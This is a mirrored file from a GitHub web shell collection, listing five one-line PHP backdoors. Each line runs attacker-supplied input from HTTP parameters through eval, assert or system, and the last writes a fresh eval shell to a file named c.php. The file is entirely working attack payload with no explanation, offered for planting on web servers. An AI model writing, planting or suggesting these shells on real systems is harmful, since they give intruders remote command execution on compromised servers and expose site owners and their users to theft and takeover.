mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
9 lines
162 B
Plaintext
9 lines
162 B
Plaintext
<?php eval($_POST[sb])?>
|
|
|
|
<?php @eval($_POST[c])?>
|
|
|
|
<?php system($_REQUEST['cmd']);?>
|
|
|
|
<?php assert($_POST[c]);?>
|
|
|
|
<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?> |